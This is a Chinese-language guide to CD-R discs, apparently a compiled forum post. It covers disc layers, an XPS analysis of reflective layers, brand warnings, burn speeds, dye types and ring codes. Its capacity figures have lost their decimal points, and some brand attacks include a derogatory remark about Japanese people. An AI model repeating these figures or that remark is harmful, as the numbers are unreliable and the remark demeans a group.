  盘基,反射层,染料涂层就不多说了。这个就算最低劣的cdr都是必须具备的。B级盘片一般缺少表面保护层,但具备紫外线保护层,如明基。紫外线光照对于cdr来说是有破坏作用的,在日光下照射一段时间后,一般不具备紫外线保护层的盘都要废掉,具备的就要好很多。表面保护层指的是在数据面背面也就是印刷面上面的涂层,这个涂层可以防止腐蚀以及外力剥蚀,日常情况下腐蚀一般是劣质记号笔在上面做标记,或者是水浸泡造成的后果,外力剥蚀相信一般都比较容易理解,cdr市场上,最著名的保护层技术是kodak的info guard技术,tdk的toughness coat技术以及Verbatim 威宝公司的DataLifePlus技术。三菱,taiyoyuden,ricoh也有自己的保护层技术,但都不如上面两家好。在cdr的结构中光盘的印刷面实际上比数据面更脆弱。因为印刷面距离记录数据的染料层近,更容易受到损伤。而且普通人只知道不要弄脏数据面,对印刷面根本不在意。如果CD-R光盘的印刷面在使用、携带过程中被沾污,比如手上的汗液、污垢留在光盘印刷面表面,随着时间的推移,那些污垢有可能对脆弱的印刷面、保护层甚至染料层造成腐蚀损害,直接威胁到宝贵的数据。因此,光盘印刷面的抗沾污能力,也是衡量光盘数据保存特性的一个重要因素。

  印刷面抗沾污能力强的CD-R光盘,将更利于数据的长时间保存。因此这个保护层是衡量b级盘片的重要指标,对于国内市场相对价格比较高的盘,比较常见的是,具备一项技术的明基,基本具备两项技术的三菱,而三菱浅蓝的保护层不如三菱的深蓝。真正完全具备两项技术的是tdk的台产RITEK OEM。此盘最高级代理的批发价都要2块4,可想而知在这个对价格非常敏感的零售市场上反响肯定不好。但好东西,他的价值应该被大家所了解,至于买不买则是另外一回事情了。

  然后是反射层,反射层在早期都是以黄金作为材料,当如kodak,mitsui(日本三井),taiyoyuden早期也是黄金反射,kodak,mitsui由于染料方面的关系,完全呈现黄金的色彩,被称为真黄金,taiyoyuden由于染料方面的关系,加上黄金反射的色彩混合,视觉呈绿色,被称为绿盘。随着成本的降低,反射层的材料变成了银,如ritek莱德,三菱,cmc中环,prodisc精碟等大厂在a级b级盘甚至c级盘一般都采用银,但一些小厂就不同了,往往用铝等其他材质作为反射层来降低成本。根据光盘的原理,读盘是否流畅,兼容性是否好,反射层非常重要。Cdr,cdrw的反射率要比普通压制光盘低,有些朋友的低速cdrom,老式的vcd,dvd,cd机往往不认cdr盘,实际上就在于反射率不够,导致无法读取数据。笔者的好友,天津大学崔博士曾做过一个实验,当时不过是好奇,看看kodak的反射层究竟是不是黄金,由于实验费用较高,无法对所有的盘片进行测试,仅仅用了几种进行测试,下面就全文引用一下实验的报告,让宁波的diy们也看看反射层的组成:

  CD-R光盘反射层及染料层化学元素分析

    为了实际验证一下不同CD-R盘片反射层和染料之间的区别,我对5种常见CD-R盘片的反射层和染料层进行了化学元素分析。

  测试样品:

  样品1:三菱Blue Platinum 52X

  样品2:三菱五彩音乐盘

  样品3:TDK欧美版(莱德代工,RFD环码,Toughness Coat)

  样品4:铼德四色(RFD环码)

  样品5:柯达黄金盘

  测试仪器:X射线光电子能谱仪

  测试中我们将被测CD-R盘片样品的反射层和基板揭开,将带有一部分染料层的反射层作为试样,进行表面元素分析。分析手段采用的是X射线光电子能谱法。

  X射线光电子能谱法(X-ray Photoelectron Spectrom——XPS)是当代对材料表面层进行结构、成分研究的重要手段。虽然只有十几年的历史,但其发展速度很快,在电子工业、化学化工、能源、冶金、生物医学和环境科学领域得到了广泛应用。XPS的主要特点是它能在不太高的真空度下进行表面分析研究,这是其它方法都做不到的。

基本原理:用X射线照射固体时,由于光电效应,原子的某一能级的电子被击出物体之外,此电子称为光电子。

  如果X射线光子的能量为hν,电子在该能级上的结合能为Eb,射出固体后的动能为Ec,则它们之间的关系为: hν=Eb+Ec+Ws 式中Ws为功函数,它表示固体中的束缚电子除克服各别原子核对它的吸引外,还必须克服整个晶体对它的吸引才能逸出样品表面,即电子逸出表面所做的功。上式可另表示为: Eb=hν-Ec-Ws 可见,当入射X射线能量一定后,若测出功函数和电子的动能,即可求出电子的结合能。由于只有表面处的光电子才能从固体中逸出,因而测得的电子结合能必然反应了表面化学成份的情况。这正是光电子能谱仪的基本测试原理。

由X射线从样品中激发出的光电子,经电子能量分析器,按电子的能量展谱,再进入电子探测器,最后用X Y记录仪记录光电子能谱。在光电子能谱仪上测得的是电子的动能,为了求得电子在原子内的结合能,还必须知道功函数Ws。它不仅与物质的性质有关,还与仪器有关,可以用标准样品对仪器进行标定,求出功函数。

XPS电子能谱曲线的横坐标是电子结合能,纵坐标是光电子的测量强度(如下图所示)。可以根据XPS电子结合能标准手册对被分析元素进行鉴定。除了可以根据测得的电子结合能确定样品的化学成份外,XPS最重要的应用在于确定元素的化合状态。
第 3 页 (本文共6页)

  测试结果
  由于CD-R光盘的染料配方属于厂家的商业机密,所以在本测试中,我们仅仅对光盘的反射层和染料层进行了简单的元素分析,并不对染料的配方和化学结构进行解析。

样品1:三菱Blue Platinum 52X

样品2:三菱五彩音乐盘

样品3:TDK (莱德代工,RFD环码,Toughness Coat)

样品4:铼德四色(RFD环码)

样品5:柯达黄金盘

第 4 页 (本文共6页)

  结果分析
  测试得到的谱图对样品表面化学元素进行了分析,打印出了元素百分比表,Atomic%,也就是元素百分含量。从中可以了解样品表面含有的化学元素种类和百分含量。例如,样品5柯达黄金盘,检测结果表明,带有染料的反射层样品,含有元素碳(C)、氧(O)、氮(N)、硅(Si)、溴(Br)、金(Au)。

从中我们得到以下结论:

  1.柯达黄金盘的反射层确实为纯金(Au);三菱蓝盘、铼德白金盘,反射层都是银(Ag)。

  2.从谱图分析结果来看,3号样本TDK欧美版和4号样本铼德四色,差别不大,可以认为这两种同为台产RFD环码的盘片,是按照同样的染料配方生产的,反射层也都是银。

  3.1号样品三菱Blue Platinum 52X和2号样品三菱五彩音乐盘,染料的元素组成是不同的,三菱Blue Platinum 52X盘的染料配方中含有溴(Br),三菱五彩音乐盘的染料中含有氟(F),这个差别,可能就是高速和低速染料盘片写入速度不同的原因。

  Ok,实验的结果相信大家心里都有谱了,关于反射层,相对较好的台湾大厂出品的盘片一般至少采用银来作为材料,最好的kodak虽然采用黄金,但成本太高,已经停产,市面上少见真货。

  最后,就是盘基和染料部分,这个也就是能用的盘和不能用的盘最大的区别。但也是比较难以辨别的。平时,不管是我们买的盘是b级,a级还是c级,那些个都还能用。以目前的现状来看,对于国内,以及宁波本地网友来说,低价盘往往是他们瞩目的焦点,往往摊位上卖得最好的就是低价盘,在这里,要澄清一点,低价不完全代表低质,低质也不一定就是低价。但可惜的是低价盘的来源十分复杂,不是有经验的朋友不会辨别。一般来说,垃圾低价盘都是港台一些小厂生产的东西,或者是台厂以及台厂在大陆工厂出来的次品,极品低价盘则是那些欧美名厂请台厂代工,由于不符合欧美出口级别淘汰下来的盘,根据常规,这些东西必须销毁,但有些厂管理不严,被人拿出来重新印刷贩卖,但这样的不好找。一般低价盘除了用料方面去掉了高端具备的所有保护层,以及反射层用铝代替之外,还有诸如盘基不平,导致光盘外围几乎不能用;染料不稳定,刚开始刻好的时候挺好,半年以后,咔嚓,全部读不出,或者一部分能读,一部分数据损坏;兼容性差,非常挑刻录机等毛病。这个的鉴别需要长期的实践中获得经验,一般来说,大厂出品的盘比较可靠,比较简单的方法是根据MANUFACTURER来辨别。

CDSPEED的测试图

请看红色框划出MANUFACTURER厂名。由于竞争激烈,现在国内常见的盘往往都是某几家厂代工的产品,我就不一一举例了。本人就说最差的三个牌子,请各位网友通缉:PLASMON,POSTECH,NANYA。

  其中PLASMON的CDR是最差的,在本人买过的几百种杂七杂八的盘中,日本原厂出品全部都是精品,台厂有好有坏,只有PLASMON的CDR最差,从来就没见过好的。但PLASMON的CDRW还可以用,如TDK就请PLASMON为他代工;POSTECH俗称博新,有JS用它的盘来伪造SONY和TDK的盘,他的盘片染料色彩有两种,一种为近乎白色的白金碟,绝对是用铝作为反射层来降低成本,常见用于假TDK白面,一种为水蓝碟,常见用于SONY的仿冒。不见得比PLASMON好到哪里去,好处就在于这个盘没有特殊的品牌在一直做,也就是说它的东西除非是伪造,都是低价杂牌货,比较容易辨别。

  NANYA就是著名的台塑出品的盘片,台塑的老板王永庆算是台湾第一富豪了,口黑口黑,也是往大陆倾销垃圾的主(也是,否则怎么发财),和以上两个厂家不同的是NANYA的盘在欧美都能常见到,曾经有友人给我一张NANYA在台湾销售的代工产品,品质可以用一流A级来形容。但国内,各位还是算了吧,惹不起躲得起。其他品牌的盘,虽然说质量参差不齐,有好有坏,但不如以上三大品牌国内不见好货那么夸张。而且这三个盘占据了80%的低价劣质盘市场,极其有代表性,务必避之。
第 5 页 (本文共6页)

  PAR3 CDR购买和使用心得
  这个部分,本来本人不想写的。牵涉到太多方方面面的事情,最后决定把里面牵涉到的一些行为恶劣的厂家来个马赛克化,明白的朋友应该能知道我说的是谁。

  首先,是对两大厂商的超级BS,一家是日本的名厂,一家是宁波当地出乎意料崇拜的大陆品牌。关于日本名厂索X,不得不发出小日本有些公司超级恶心的感慨。实际上这家公司在欧美,日本等地销售的CDR都是CDR标准缔造者-日本TAIYOYUDEN公司代工,或者是日本RICOH公司代工的真正A级盘,兼容性极佳,质量没得说了。但在我们中国销售的东西,看MANUFACTURER看出是SXXX,但实际上却是香港荣利这样的小厂弄出来的货色,如果手里面有这样的大陆版本SXXX盘,可以拿出来看一下,就可以发现在外面销售的盒装都是MADE IN HK。不知道是脑子搭错了,还是故意为之,欧美优质SXXX盘片都应该是上面两家日本公司的MANUFACTURER,日本人对中国人的歧视,从这个地方可见一斑。荣利的东西不是不好,实事求是说,应该算B级。但价格就太过分了,换了一个牌子就出乎意料的贵,严重不值这个价钱,摆明了就是扛着牌子举着刀,见人杀人见佛杀佛。

  SXXX和三菱不一样,三菱有自己的工厂和技术,虽然是台湾中环或者精碟代工,但中环,精碟都是全球排名前四位的大厂,并且使用的技术和配方都是三菱自己的,不过是借用人家的厂房和工人而已。SXXX没有自己的技术和配方,完全都是外包代工,而且代工厂家还是乡镇企业,汗。。这样的厂家作风,怎么能叫国人满意。

  关于那个叫大XX的国内品牌,此品牌在宁波本地市场销量不小,进货的JS也纷纷指定要这个品牌,因为这个牌子出乎意料的受欢迎。大XX的确是老牌子,笔者2000年就已经见到此品牌的CDR在市面上销售,应该说,早期的大XX是非常不错的东西,品质虽然在当时不算好,但比起现在的要好太多,在原装KODAK普遍售价在15元以上的时候,给了广大DIY一个非常便宜的替代品,3,4块就能买到其他牌子要15元的东西,的确实惠,质量差一点也认了,谁叫咱穷呢。但现在这个时代过去了,三菱的盘售价都不会超过2块6,大XX的价格优势并不是太明显,就算不会砍价,零售价格最多也就7毛钱的差距。更何况现在大XX的质量和前几年的根本不能相提并论,前几年的利润空间大,所以品质反而好,现在要保持相应的利润率,质量下降的离谱。包括三菱都是这样,曾经的3块多钱的三菱,要比现在2块5的好。同时,大XX一直都是PLASMON的代工,PLASMON的盘在前面已经进行了通缉,对于此品牌的品质,我不想多说,大XX当年曾经给我有惨痛的回忆:用56k猫下载下来的上千部的哲学和宗教著作全部完蛋,因为已经过了半年,硬盘里面也已经删除,真的是欲哭无泪。很多人都说,那个盘便宜阿,加上还能保换,没有后顾之忧,我们是穷人,用不起高价盘,人家政策也好。笔者认为,这个概念有正确的也有不正确的。关于刻坏包换,我是不屑一顾的,为什么会刻坏?好盘会刻坏么?实事求是说,就算是C级盘,在CDR已经在国外渐渐退出市场的这个年代,所有正常的机器都不会刻坏,刻坏有50%是兼容性的关系,比方说你的刻录机太老了,对新的高速盘片兼容性不好;也有特殊的情况如BENQ和PRODISC的兼容问题,对于这样的情况,换100张也是坏,只好换一个牌子使使才成;另外50%是盘实在太次。

  在早年的机器,由于没有防烧死技术,刻飞盘是很正常的,现在技术层次上解决了硬件方面的问题。去掉电源,系统有问题等外界干扰,哪里还来什么飞盘的说法。因此包换根本就是噱头,没有任何实际意义,包换不是代表他对自己的产品有信心,而是没有信心,利润率巨大的关系。加上cdr块把钱的价格,大部分人都懒得为那么1块,2块亲自去电脑市场交涉一下,至少本人就很少去更换,更换率和损坏率之间没有任何联系。国外也有包换这个条款,日本著名的音响公司安桥,也有CDR产品,请的是台湾精碟公司做的OEM,他上面对于包换条款的定义很严格,只有当科学检验的确是盘不好的情况下,才能更换相同型号的产品。SONY日本公司,因为召回可能会发生问题的随机奉送DVD+RW,导致公司股票狂跌,天天给人BS。如果根据他们的标准,大XX就不是召回的问题了,直接销毁算了。欧美公司在这点上绝对应该值得国内厂家的学习,奉送的盘存在缺陷就会给召回,国内厂商只会一味打价格战,恶意倾销,等外品当正品的现象比比皆是,对产品质量丝毫不加注意。

  对于我们这些普通用户来说,刻飞盘根本不可怕,飞就飞了么,怕的是他不飞,但数据丢失,读不出来。大部分DIY在刻好以后,都没有检验数据准确性的习惯,毕竟是备份么,没必要每张都读, 但当你把盘拿出来要恢复数据,或者带着他外出COPY的时候,发现不能用,并且源文件已经没有的话,那后果是不堪设想的,尤其是数据,对于VCD和AUDIO格式来说,如果盘上面有损坏,盘质量不好,最坏的结果也就是出来大量马赛克和爆音,不爽归不爽,但勉强还能用,数据方面坏就坏了彻底了,绝对不会给出马赛克。但碰上那些染料有问题,良好的保存条件下几个月后都全部损毁的情况,那就根本防都放不住。盘,有价,数据无价阿!大XX的价格不错,但现在已经不是当年了,市场上比他低价的都有的是,1块7–1块9的区间里面,性价比更好的选择不计其数。大XX也就是价格看上去可以,质量两个字是没有的,他的东西甚至不符合CDR的最低标准规范。傻乎乎的散客对市场不了解,但我相信广大真正的DIY的眼睛应该是雪亮DI。
第 6 页 (本文共6页)

  最后介绍两个小经验

  1:刻录速率选择,对于刻录速率,我曾经见过不少人,拿了盘就硬上52X,实际上这个做法是不正确的,国内厂商一般都会狂吹自己的机器怎么怎么好,包上52X。对于广大用户简直就是恶意的误导,日厂大品牌就要好一点,比如SONY的52XCDRW机器,就在自己的包装上注明:为了数据安全,建议使用40X。全球第一的PLEXTOR的52X机种也建议使用40X,包括PLEXTOR奉送的随机盘片,都是48X的日产TAIYOYUDEN。

  52X?速度太高了,不要说国内,国外的大部分盘都到不了这个速率,而且这个速率不光对盘要求高,对机器的电机要求也高,短时间也许没问题,长时间绝对不行。真的喜欢高速刻录用32X-40X之间比较适合。对于VCD和CD,建议速率不要超过16X,确保兼容性和稳定性,否则可能导致在普通VCD,DVD机器上不能播放或者马赛克,爆音现象严重。AUDIO方面,YAMAHA,PLEXTOR,TEAC这传统三大名厂官方建议都是4X或者8X,AUDIO盘以选择低速盘片为好,在国外,AUDIO专用的盘很常见,国内就很少见,AUDIO专用的盘对于染料和盘基的要求很高,还要支付给音乐公司一定的版税,且都要低速盘来做才成,这个不是在印刷上下一点功夫,印上几个音乐符号就说是audio能解决的,国内比较好的选择是三菱的深蓝系列,那个是比较常见的低速盘。不是说他好,而是相对容易找,在这个价位,算是不错的选择。

  2:简单的测试,如果用LITEON,SONY的刻录机,可以通过KPROBE这个软件对盘片进行测试;其他的可以通过CDSPEED的SCANDISC进行测试,SCANDISC必须支持弱磁区扫描的机型才能使用;谁都可以用的方式就是CDSPEED的传输速率测试,找一台相对速度较慢的CDROM最好,比方说用40X的CDROM进行测试,看一看读盘的那根线是否平整,好用的盘刻好以后,读盘速率曲线非常平整。如果在52x的高纠错机种上面,读盘曲线都是波浪起伏的话,请尽快去退换把

  一分价钱一分货,相信咱宁波的网友都明白这个理儿,对于如何选择,应该有自己的标准,我写这个CDR的部分,主要是为了让大伙明白,什么是A级盘,高价贵在那里。品牌意味着什么,理性的市场不应该仅仅是价格战,还必须高中低三个档次全部具备。对于该购买什么牌子不作建议,在这里,仅仅请那些一味要求低价盘的朋友关注一下PRODISC台湾精碟公司出品的东西,相对来说,精碟的高速性能非常出色,盘基也稳定,价格也很诱人。但缺点是盘比较薄;精碟在低价盘的态度上,是在盘基厚度上进行缩水,降低成本,相对而言,在其他方面还是相当不错的,比那些直接用次品,等外品来做低价盘的JS要好很多,更主要的是,就算1块5的PRODISC,用起来也很顺手,没有过于严重的品质问题,不太会挑选的朋友买那个比较省心,会挑选的另当别论。当然,prodisc和BENQ的机器兼容性不佳,用BENQ机器的朋友还是太平点,其他的不多说了。购买的权力都在大伙自己手上,作为一个DIY,只是抱着有经验就要让大伙分享的原则写东西。下面是对于DVDR的指南,由于笔者弄这个DVD的时间不长,所以还请广大有经验的朋友指正。

http://www.qiyecard.com/whatcd/b_cd-r/b-06.asp

一、CD-R盘片的基本结构

CD-R标准是飞利浦公司于1990年制定的,被称作橙皮书PartⅡ。CD-R技术目前应用非常广泛,由于其记录成本非常低,每兆字节不到3分钱,在数据备份与交换、多媒体应用、桌面出版等众多领域得到了广泛的应用。

CD-R盘片具有与一般CD盘片相同的外观尺寸,它上面所记载资料的方式与一般CD光盘片一样,也是利用激光的反射来读取资料,所以CD-R盘片可以放在CD-ROM上读取。

CD-R盘片的片基与传统的 CD 盘片基本一样,但表层的“刻痕”不同。在传统CD片上有螺旋状的轨道(Track),而这些轨道又是由很多不连续的凹槽所组成,这些凹槽是用激光“雕刻”成的,又称之为“坑”(Pits),坑与坑之间的地方称为“岛”(Land)。在CD-R盘片上以连续的槽沟(Groove)取代“坑”,并组成螺旋状的轨道(Track),而“坑”就被记录在这些槽沟内。在空白的盘片上,槽沟有几个重要的用途,包括转速控制、寻道控制及时间指示等。在槽沟上面是感光层(有机染料,Organic dye material)及反射层(黄金,Gold),最后再加上保护层及印刷层。

当刻录CD-R盘片的时候,光盘刻录机发出高功率的激光,聚焦在CD-R盘片某特定部位上,使这个部位的有机染料层产生化学反应,因而这个部位就不能反射CD光盘机所发出的激光,相当于传统CD盘片上的“坑”;没有被高功率激光照到的地方可以依靠黄金层反射激光,相当于传统CD片上的“岛”,这与普通CD-ROM的读取原理基本相同。

刻录盘的结构剖面图:

让我们从下往上说明,首先是盘片最重要的部分:E层。最下面的E层实际上是塑料基底,它占有整个盘片中最多的体积,是形成盘片强度和形状的关键。向上的D层就是最关键的部分,该层就是刻录和保存数据的层面,刻录盘的性能就取决于该层的质量,下面我们将详细介绍。再向上,C层是反射层,用来反射光驱或者刻录机的激光束,低档的盘片可能用铁或者铝,而高档的刻录盘则采用银作为反射介质。B层是保护层,能防止盘片的数据层(D)和反射层(C)遭到各种意外破坏。最后的A层实际上是各个公司来图画标志的层面,我们通常看到刻录盘的商标和图案就在这一层。

http://article.pchome.net/2000/11/23/490.htm

CD-R盘片的种类

CD-R盘片使用有机染料(organic dye)作为记录层的主要材质。这种有机染料是几百万个相同分子连接在一起而形成的组织结构。直到最近,两种基本种类的有机染料才开放各CD-R盘片工厂使用,它们分别为绿色的cyanine与金黄色的phthalocyanine。而三菱化学公司(Mitsubishi Chemical Company)与Verbatim公司联合发表了一种新的有机化学组成材质叫做AZO(蓝色),它不用一般常见的黄金作为反射层而使用银作为反射层,所以你会看到一边是蓝色,而另一边是银色。我们常常听到使用者在讨论CD-R的盘片,到底是金盘好还是绿盘好? 其实不管是新发表的蓝盘还是市面上常见的金盘或绿盘,各有各的优点,各有各的缺点,以下就来讨论这个问题。

Cyanine (绿盘)

在橘皮书(Orange Book / CD-R 标准书)中对CD-R盘片的规格制定,原来是参考由太阳佑电公司(Taiyo Yuden)所提出的cyanine种类的CD-R盘片材质。Cyanine是由太阳佑电(Taiyo Yuden)所发明,它也是其它两种材质的原型材质。换句话说,是先有cyanine,然后phthalocyanine与AZO才根据 cyanine 改良而成。大多数的 CD-R 光碟刻录机是参考cyanine的特性而设计,而现今 CD-R 盘片的工厂也大多使用cyanine材质,相信它也会在市面上出现最久。Cyanine 原始材质非常怕强光,是属于感光性材料,在制造时必须加入合成适当的铁金属以降低对光的感应能力,一但完成 CD-R 盘片的制作后,只有CD-R光碟刻录机内的高功率激光才能改变它的性质。用Cyanine材质做成的CD-R盘片有着翡翠绿的颜色,但是也有些工厂做出”蓝绿”色的CD-R盘片,其实cyanine本质为青蓝色,所以才称为 cyanine (青蓝),但是在制作时,因为与黄金反射层合并组合,而成为绿色 (蓝 + 黄 = 绿)。如果是使用银来作为反射层,结果你会发现此种碟片成为深蓝色。

许多CD-R相关技术的公司都建议使用 cyanine 绿盘,原因是这种材质可以接受较广范围的读写镭射,而可相容于大多数型式的CD-R光碟刻录机。而且最新的cyanine材质可以适用于不同的写入速度,从1x(单倍速)到12x(12倍速)皆可接受,且可应用于各种不同镭射强度的机器。更多数新推出厂牌的CD-R光碟刻录机更以cyanine材质CD-R盘片规格来设计测试。前文提到过,CD-R记录资料是利用高功率(高热)激光照射在CD-R盘片上的有机染料层,使其造成熔化(材质改变)而做成pit的功能。这种改变是以独立的分子作为基本的单位,并不会造成扩散。刻录完成的盘片在刻录面可以明显看出两种不同的颜色深度,即代表有资料区(从内圈开始)与无资料区(外圈部份)。

Phthalocyanine(金盘)

Phthalocyanine 的 CD-R 盘片呈现金黄的颜色,这是因为这种有机染料它自己是接近透明的浅黄色。制造此种 CD-R 盘片的工厂只有 Kodak (柯达) 与 Mitsui Toatsu(三井),其他看到的厂牌源头也是出自这两家公司。Phthalocyanine 碟片的支持者指出,Phthalocyanine材质有更好的抗光性,能延长存放资料的时间,可超过100年以上。Phthalo- cyanine材质的CD-R盘片与Cyanine一样,也是靠利用高功率镭射改变有机染料层(熔化而质变)做成pits来记录资料。

Azo(蓝盘)

Verbatim 公司发表了一种叫做 new DataLifePlus 的 CD-R 盘片,由 Verbatim 的母公司:三菱化学公司(Mitsubishi Chemical Company) 负责生产,这种新的CD-R 碟片是使用金属化Azo有机染料加上低价银材质作为反射层的盘片。这也是三菱化学公司首次将这种材质的盘片量产上市,这种盘片有着银白色的标签面,读写面则呈现深蓝色。与早期太阳佑电发表cyanine材质的CD-R盘片一样,初期的Azo材质只能使用于单倍速或是双倍速的 CD-R 光碟刻录机,而无法顺利使用在高速度(4x)的刻录机机种,然而当DataLifePlus CD-R盘片的发表,Verbatim公司正式宣布此种新配方的 Azo CD-R 盘片克服了速度上的瓶颈,已经可以在 4 倍速的光碟刻录机上使用。

Verbatim公司在早期研发Azo材质时,经过很多的测试发现,此种材质的寿命可达100年,并且提供了产品终身保用,只要记录完成并无错误之盘片,在任何时间产生读取的错误的情况,可免费更换一片全新的 CD-R 盘片。其实真正的问题是,直到今日,业界尚未有一个独立公正客观的公司来对这些 CD-R 盘片产品进行评估,测试查证。

CD-R盘片与写入速度的关系

要成功录制一片CD-R盘片,光碟记录器内部的温度控制,镭射功率控制,写入作业控制及转速都必须控制在理想的范围,这样就可以达到”即时”写入的功能,这里所谓的”即时”是指50分钟的资料,于50分钟就可写入完成,也就是一倍速的写入。在我们还不讨论四倍或六倍的写入速度,我们先来看看红皮书所定的标准。红皮书,代表 CD-Audio 的格式标准,每秒钟可播放频率44.1KHz或是44,100个取样资料的音乐。红皮书规定了 CD 播放的速度为每秒钟 1.2到 1.4公尺磁轨的长度。早期电脑用的CD-ROM光驱采用这种速度来读取资料,等于是每秒钟读取 75个磁区 (Sector)。然而因为CD-ROM资料的读取并不是连续的循序读取,很可能要常常读取为在不同区域(轨道)的资料,因此速度就变成很重要了。以数位图像资料(AVI或是MOV档案)为例,它资料存放的方式就像 CD-Audio 一样,属于循序式存放,然而因为它是使用高压缩比来压缩视讯 (Video),在播放的时候,如果采用单倍速播放,会因资料传送的速度不足而使画面产生不连续(跳格)的现象。这种现象使得在电脑多媒体的应用上,必须使用更快速度的光驱,许多CD-ROM光驱的硬体制造商发表了高倍速光驱。有一个重点,就是这些光驱还是必须相容于单倍速的播放CD-Audio片子,而在其他电脑资料的盘片采用全速的播放。很自然的,CD-R光碟刻录机也摆脱不了对速度的追求,早期的CD-R光碟刻录机只是用来刻录 CD-Audio 音乐用的,单倍速写入速度,也就是说60分钟的音乐需要60分钟来刻录,另外再加上几分钟时间写 Lead-in与 Lead-out。当改良CD-R产品的设计后,加上新配方CD-R盘片的配合,开始出现双倍速的机器,60分钟的资料,只要半个小时(30分钟) 就可以写完。然后是四倍速的机器出现,同样60分钟的资料,只需15分钟的写入时间即可完成。越高的速度代表越贵的售价。其实真正要了解的重点是,CD-R写入的速度与将来这片CD-R要播放的速度完全无关,用四倍速 CD-R 光碟刻录机写出来的片子,播放时并不一定需要四倍速的CD-ROM。举例来说,数位图像资料 (AVI 或 MOV档案),用四倍速光碟记录器写完资料后,可以用单倍速的 CD-ROM 来播放,只是播放时并不一定很平顺就是了。

三、CD-R盘片容量的计算

常见的CD-R盘片有两种时间长度,刻录设置时,分为三种格式,相应地,刻录的容量也就相差较大。具体的容量计算方法如下:

1、63分钟CD-R盘片

对ISO格式而言,容量计算如下:

63(分)×60(秒)×75(格)×2048bytes/1024/1024=5537109375MB

对Audio格式而言,容量计算如下:

63(分)×60(秒)×75(格)×2352bytes/1024/1024=6359024047852MB

对XA格式而言,容量计算如下:

63(分)×60(秒)×75(格)×2336bytes/1024/1024=6315765380859MB

2、74分钟CD-R盘片

对ISO格式而言,容量为650390625MB

对Audio格式而言,容量为7469329833984MB

对XA格式而言,容量为7418518066406MB

此外,盘片的容量还与CD-R制作中的“预刻沟槽的绝对时间”(Absolute Time In Pregroove)有关。74分钟的盘片比63分钟的盘片摇摆的频率少,盘片转得慢,由激光烧成的坑(Pit)自然就比较短;相反地,转得快的片子由激光烧成的坑(Pit)就比较长。

此外,我们在购买时应尽可能到当地信誉好的电脑城中去购买,在电脑城购买的CD-R盘片质量一般比在一些小店买的盘片有保证一些,而且价格相差也并不会太大。

hoho,纪念最后张PLASMON烂碟。

看环码识别CD-R/RW制造厂商和选购技巧

http://www.cdbest.net/2003/ReadNews.asp?NewsID=2341

随着宽带上网,DC、DV进入寻常百姓家,曾经我们认为的海量硬盘已经越来越不堪重负,而曾经价格高高在上的CD-RW刻录机在刻录速度达到终极52倍速后,价格是一降在再降,更有的厂商推出了52倍速刻录机268元的地价,再加上价格低廉的CD-R/RW刻录碟片(以下简称碟片),使用碟片成为普通用户操作简便、成本低廉,储存和备份数据的最好方式。

俗话说,好马还须配好鞍,面对市场上多达上百种品牌的碟片,我们该选择什么样的呢?又如何能够知道买到的碟片是真是假是好是坏?这成为普通用户选择和购买的难题。

当然大家可以通过使用识别碟片信息的的测试软件来测试一下,这方面的软件如NERO自带的CD SPEED、INFOTOOL和CD MATE自带的光驱管理员等都可以查看碟片的生产厂家等信息,不过大家在市场上选购碟片时总不成带着自己的爱机去^_^,那么有没有一种简单而直观的方法来识别碟片的生产厂家呢?答案是肯定的。虽然碟片的品牌有上百乃至上千种,但是千变万变不离其宗,主要的碟片生产厂家也就那么二三十家而已,国内销售的大部分碟片的生产厂家现阶段主要由台湾厂家以及其在大陆的分厂和大陆的厂家生产,今天笔者就给大家介绍一种通过看碟片的环码来识别生产厂家的小方法。

首先介绍一下什么是碟片的环吗。简单来说,环吗就是在碟片的数据内圈,夹持区外的一行字码,因为其围绕夹持区呈环形排列,所以习惯称之为环码,如图所示是台湾产量最大的三家碟片的生产厂家的环码图,可以看出每个生产厂家对环码的标注是不一样的,这就为我们肉眼直观识别碟片的生产厂家提供了依据。图中的喷码则记录了碟片的生产日期、采用的生产线以及所用的染料类型等。下面就简单介绍一下各个碟片生产厂家的市面常见品牌碟片的环码信息,如无特殊说明,X代表任意英文字母,Y代表任意阿拉伯数字:

Ritek.Co(铼德):RXD(A) 74(80)M-YYYYY 74(80)DA,其中X代表的英文字母为碟片的染料类型,D代表数据专用碟,A代表音乐专用碟,只有音乐专用碟由后面的DA字母,常见的有:

RFD 超高速白金  RAD 高速白金    RJD中速白金
RSD 低速白金    RVD 高速水兰    RED 中速水兰
RGD 视觉黄金    RKA 音乐燃料    RAA 音乐燃料
RTD 大于700M的超大容量白金盘   RWD 可重复写入。

铼德德是台湾最大的CD-R/RW和DVD刻录碟片生产厂家,其生产的国内市场上常见的著名品牌碟片有铼德自有品牌RITEK和RICOH、TDK。另外铼德在国内的分厂如重庆新华只生产RFD环码的白金盘和环码为CDRLSS80M-YYYYY的白金盘,RFD的碟片和台产的碟片区别在于没有图中的喷码,常见的第一种环码的碟片如清华同方,第二种环码的如新华光盘,不是上述环码的可以肯定是假货。

CMC(中环):CD-R 80 XXLHXYYYY YYYY或CD-R 80 XXLHXYYYYY,其生产的国内市场上常见的著名品牌碟片有PHILIPS白金、水兰、视觉黄金碟片、AUDIO碟片和使用Mitsubishi技术和染料生产的Mitsubishi系列碟片,Mitsubishi碟片有着不同于CMC的环码,将在后面介绍。

Prodisc(精碟):R(W)0YY-YYYY-YYYY,R表示一次性写入碟片,W表示可重复写入碟片,其中第一组中常见的有R008、R020、R043、R046、R049、R052等,数字越大代表所能达到的刻录速度也越高,其生产的国内市场上常见的著名品牌碟片有精碟自有品牌SMARTBUY和Mitsubishi52倍速白金碟片。

PRINCO(巨擎):台湾老四,不过大陆市场并不常见,环码为:
79.50XX SHR-00YY。

Mitsubishi(三菱):ZA/B/CYYYY-CDR/RW-XYYX M/P/Q/74/80  AZO/AUDIO,其中A、B、C代表生产的年代,字母越往后出厂的日期就越晚,CDR代表一次性写入碟片,CDRW代表可重复写入碟片,M、P代表最高4倍速的低速可重复写入碟片,Q代表高倍速可重复写入碟片,AZO代表是高速浅蓝碟片,AUDIO代表这是音乐染料碟片。

另外有着三菱环码的一次性写入碟片都是使用AZO染料的蓝盘,精碟给三菱代工的白金碟片的环码为精碟环码。
WILTECH(荣利):香港厂家,SONY指定的专供大陆市场的OEM厂商之一,所以荣利的环码有自有环码CD-R 80min WL21-YYY和SONY环码U5-00YY,一般搞婚庆的朋友比较喜欢使用荣利碟片。

LEADDATA(利碟):X80HD D00YYY Y,SONY指定的专供大陆市场的OEM厂商之一,SONY水兰居多。

PLASMON(大自然):杭州大自然光电科技有限公司,环码为CD-R UG 80或CD-R UG80 E,现在市场上非常常见的碟片生产厂家。

